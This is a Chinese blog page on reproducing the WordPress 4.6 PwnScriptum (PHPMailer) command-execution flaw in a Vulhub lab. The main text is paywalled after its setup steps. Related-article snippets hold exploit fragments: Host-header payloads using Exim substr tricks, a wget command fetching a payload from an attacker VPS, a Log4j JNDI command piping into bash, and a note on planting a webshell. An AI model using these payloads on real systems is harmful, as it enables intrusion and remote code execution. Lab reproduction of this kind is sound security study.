Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现

最新推荐文章于 2025-10-30 15:09:42 发布
原创 最新推荐文章于 2025-10-30 15:09:42 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

本文详细描述了如何复现WordPress4.6.0版本由于PHPMailer组件导致的命令执行漏洞。攻击者通过构造特定payload,在用户找回密码过程中触发漏洞,可执行任意命令,甚至获取服务器的反弹shell。该漏洞影响WordPress低于4.6.0及PHPMailer低于5.2.18的版本。复现步骤包括设置靶场环境、捕获数据包、替换payload并监控攻击机上的HTTP服务以接收反弹shell。

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述:

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞。

漏洞影响版本:

WordPress <= 4.6.0 PHPMailer < 5.2.18

漏洞复现版本:

WordPress = 4.6.0

复现过程:

1:使用vulhub中靶场启动环境

2:浏览器访问http://your-ip:8080

3:点击安装 填写用户名等其他信息 用户名后续需要被用到

最低0.47元/天 解锁文章
3ize0f
关注
vulhubWordPress pwnscriptum漏洞复现
qq_58873970的博客
09-04 483
phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。
vulhubWordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)
weixin_42884199的博客
12-06 564
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
WordPress靶场
2503_90824938的博客
03-20 1184
步骤⼀:接着上⼀个环境使⽤...将带有后⻔的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外观】 --》 【编辑】 --》 404.php。登陆WP后点击 【外观】 --》 【编辑】 --》 404.php。步骤三:在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮。
漏洞复现-乱复一通
最新发布
2303_81631620的博客
10-30 1459
本文总结了多个常见漏洞复现过程,包括WordPress路径遍历(CVE-2024-9047)、Tomcat WebSocket DoS(CVE-2020-13935)、Apache OFBiz多个RCE漏洞(CVE-2024-36104)、Spring Gateway RCE(CVE-2022-22947)等。详细记录了漏洞环境搭建、POC构造和利用方法,重点分析了漏洞触发点和绕过防御的关键技术,如路径穿越、特殊字符编码等。每个漏洞都包含具体的HTTP请求示例和测试步骤,并针对不同靶场环境(如春秋云镜)
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 2111
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
wordpress 4.6任意命令执行漏洞PwnScriptum复现
永远是少年
12-31 2401
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞PwnScriptum复现。 一、wordpress 4.6任意命令执行漏洞PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞PwnScriptum复现
Wordpress漏洞复现
weixin_52194536的博客
09-10 1万+
cms漏洞
vulhubWordpress 4.6 任意命令执行漏洞复现
yougexiaojiuguan的博客
03-04 1027
漏洞复现的记录
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
vulhub靶场log4j2漏洞复现
A2893992091的博客
09-08 529
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
Vulhub靶场Nginx解析漏洞复现
mirliasheong的博客
12-21 967
原理:这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /xx.jpg/xx.php 解析为 php ⽂件。当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。上传成功,访问一下我们的文件,删除一个g,再抓包。再上传,发现上传成功了。
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6842
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
4.6版本Wordpress漏洞复现
wutiangui的博客
09-09 709
国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。国内的CMS会追求大而全,而国外的CMS更注重生态,更注重友好的接口,更多的功能留给第三方开发插件来实现。推荐几个比较新的:ProcessWire,OctoberCMS,CraftCMS。
Wordpress 4.6 任意命令执行漏洞
m0_63241485的博客
08-17 1319
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,需要你有一定的专业知识。WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。...
vulhubWordpress 4.6 pwnscriptum 任意命令执行漏洞
qq_45300786的博客
04-16 1282
访问地址:http://your-ip:8080/wp-login.php 这里我就简单说下需要特别注意的地方。 1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替 2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替 Payload,在tmp处添加success文件 aa(any -froot@localhost -be ${run{/bin/touch /tmp/success
Wordpress 4.6 任意命令执行漏洞PwnScriptum
EC_Carrot的博客
08-21 605
漏洞详细 详细务必请看:https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md 漏洞复现 发送如下数据包,可见/tmp/success已经成功创建: POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}b
wordpress漏洞复现
cheapkiller的博客
08-03 660
点击【外观】——>【编辑】选择404.php并将文件改为我们的一句话木马。然后我们访问刚刚修改的文件内容说明我们注入成功就可以了。
WordPress--漏洞复现
Jz031212的博客
08-04 1021
4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。3.将文件内容改为我们的。
vulhub靶场cve-2019-13288漏洞复现
06-28
Vulhub是一个漏洞环境集合,因此我们可以假设用户已经安装了Vulhub并希望在其中复现漏洞漏洞信息:CVE-2019-13288是一个Linux内核提权漏洞,影响5.1.17之前的内核版本。该漏洞是由于在`ptrace_link`函数中错误...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值